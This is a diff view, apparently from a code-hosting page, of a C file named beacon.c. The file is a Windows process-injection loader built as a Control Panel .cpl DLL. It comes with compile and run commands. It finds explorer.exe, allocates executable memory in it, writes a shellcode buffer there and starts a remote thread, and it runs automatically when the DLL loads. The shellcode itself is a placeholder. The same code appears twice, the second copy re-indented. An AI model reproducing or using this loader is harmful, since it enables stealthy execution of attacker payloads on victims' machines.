ag-michael · May 22, 2022 19:21
diff --git a/beacon.c b/beacon.c
 // To compile:x86_64-w64-mingw32-g++ -shared  -fno-stack-protector  -o bacon.cpl bacon.c
 // To run: rundll32.exe shell32.dll,Control_RunDLL beacon.cpl
 // To run: control.exe beacon.cpl
 #include <windows.h>
 #include <tlhelp32.h>
 #include <winternl.h>

 typedef NTSTATUS (NTAPI * NtCreateThreadEx_t)(
 	OUT PHANDLE hThread,
 	IN ACCESS_MASK DesiredAccess,
 	IN PVOID ObjectAttributes,
 	IN HANDLE ProcessHandle,
 	IN PVOID lpStartAddress,
 	IN PVOID lpParameter,
 	IN ULONG Flags,
 	IN SIZE_T StackZeroBits,
 	IN SIZE_T SizeOfStackCommit,
 	IN SIZE_T SizeOfStackReserve,
 	OUT PVOID lpBytesBuffer);

 int FindTarget(const char *procname) {

        HANDLE hProcSnap;
        PROCESSENTRY32 pe32;
        int pid = 0;
 	
        //Take a snapshot of all processes in the system.        
        hProcSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
        if (INVALID_HANDLE_VALUE == hProcSnap) return 0;
 	
        // Set the size of the structure before using it        
        pe32.dwSize = sizeof(PROCESSENTRY32);
 	
        // Retrieve information about the first process,
  	// and exit if unsuccessful        
        if (!Process32First(hProcSnap, &pe32)) {
                CloseHandle(hProcSnap);
                return 0;
        }
        
 	// Loops through the process list and looks for maching string.
        while (Process32Next(hProcSnap, &pe32)) {
                if (lstrcmpiA(procname, pe32.szExeFile) == 0) {
                        pid = pe32.th32ProcessID;
                        break;
                }
        }
                
        CloseHandle(hProcSnap);
        
 	//Returns the pid of target process.
        return pid;
 }


 //Cplapplet
 extern "C" __declspec(dllexport) LONG Cplapplet(
 	HWND hwndCpl,
 	UINT msg,
 	LPARAM lParam1,
 	LPARAM lParam2
 )
 {
 int pid = FindTarget("explorer.exe");
 HANDLE hProc = OpenProcess( PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | 
 						PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE,
 						FALSE, (DWORD) pid);

 unsigned char shellcode[] = "<shellcode>";
 	NtCreateThreadEx_t pNtCreateThreadEx = (NtCreateThreadEx_t) GetProcAddress(GetModuleHandle("NTDLL.DLL"), "NtCreateThreadEx");
 	LPVOID addressPointer = VirtualAllocEx(hProc,NULL, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READ);
 	WriteProcessMemory(hProc,addressPointer,(PVOID) shellcode,sizeof(shellcode),(SIZE_T *) NULL);
 	HANDLE hThread = CreateRemoteThread(hProc, NULL, 0, (LPTHREAD_START_ROUTINE) addressPointer, NULL, 0, NULL);
 	if (hThread != NULL) {
 			WaitForSingleObject(hThread, 500);
 			CloseHandle(hThread);
 			return 0;
 	}

       CloseHandle(hProc);
 	Sleep(10000);
 	return 1;
 }

 BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
 {
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
 	{
 		Cplapplet(NULL, NULL, NULL, NULL);
 	}
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
 }
	// To compile:x86_64-w64-mingw32-g++ -shared -fno-stack-protector -o bacon.cpl bacon.c
	// To run: rundll32.exe shell32.dll,Control_RunDLL beacon.cpl
	// To run: control.exe beacon.cpl
	#include <windows.h>
	#include <tlhelp32.h>
	#include <winternl.h>

	typedef NTSTATUS (NTAPI * NtCreateThreadEx_t)(
	OUT PHANDLE hThread,
	IN ACCESS_MASK DesiredAccess,
	IN PVOID ObjectAttributes,
	IN HANDLE ProcessHandle,
	IN PVOID lpStartAddress,
	IN PVOID lpParameter,
	IN ULONG Flags,
	IN SIZE_T StackZeroBits,
	IN SIZE_T SizeOfStackCommit,
	IN SIZE_T SizeOfStackReserve,
	OUT PVOID lpBytesBuffer);

	int FindTarget(const char *procname) {

	HANDLE hProcSnap;
	PROCESSENTRY32 pe32;
	int pid = 0;

	//Take a snapshot of all processes in the system.
	hProcSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	if (INVALID_HANDLE_VALUE == hProcSnap) return 0;

	// Set the size of the structure before using it
	pe32.dwSize = sizeof(PROCESSENTRY32);

	// Retrieve information about the first process,
	// and exit if unsuccessful
	if (!Process32First(hProcSnap, &pe32)) {
	CloseHandle(hProcSnap);
	return 0;
	}

	// Loops through the process list and looks for maching string.
	while (Process32Next(hProcSnap, &pe32)) {
	if (lstrcmpiA(procname, pe32.szExeFile) == 0) {
	pid = pe32.th32ProcessID;
	break;
	}
	}

	CloseHandle(hProcSnap);

	//Returns the pid of target process.
	return pid;
	}


	//Cplapplet
	extern "C" __declspec(dllexport) LONG Cplapplet(
	HWND hwndCpl,
	UINT msg,
	LPARAM lParam1,
	LPARAM lParam2
	)
	{
	int pid = FindTarget("explorer.exe");
	HANDLE hProc = OpenProcess( PROCESS_CREATE_THREAD \| PROCESS_QUERY_INFORMATION \|
	PROCESS_VM_OPERATION \| PROCESS_VM_READ \| PROCESS_VM_WRITE,
	FALSE, (DWORD) pid);

	unsigned char shellcode[] = "<shellcode>";
	NtCreateThreadEx_t pNtCreateThreadEx = (NtCreateThreadEx_t) GetProcAddress(GetModuleHandle("NTDLL.DLL"), "NtCreateThreadEx");
	LPVOID addressPointer = VirtualAllocEx(hProc,NULL, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READ);
	WriteProcessMemory(hProc,addressPointer,(PVOID) shellcode,sizeof(shellcode),(SIZE_T *) NULL);
	HANDLE hThread = CreateRemoteThread(hProc, NULL, 0, (LPTHREAD_START_ROUTINE) addressPointer, NULL, 0, NULL);
	if (hThread != NULL) {
	WaitForSingleObject(hThread, 500);
	CloseHandle(hThread);
	return 0;
	}

	CloseHandle(hProc);
	Sleep(10000);
	return 1;
	}

	BOOL APIENTRY DllMain( HMODULE hModule,
	DWORD ul_reason_for_call,
	LPVOID lpReserved
	)
	{
	switch (ul_reason_for_call)
	{
	case DLL_PROCESS_ATTACH:
	{
	Cplapplet(NULL, NULL, NULL, NULL);
	}
	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
	case DLL_PROCESS_DETACH:
	break;
	}
	return TRUE;
	}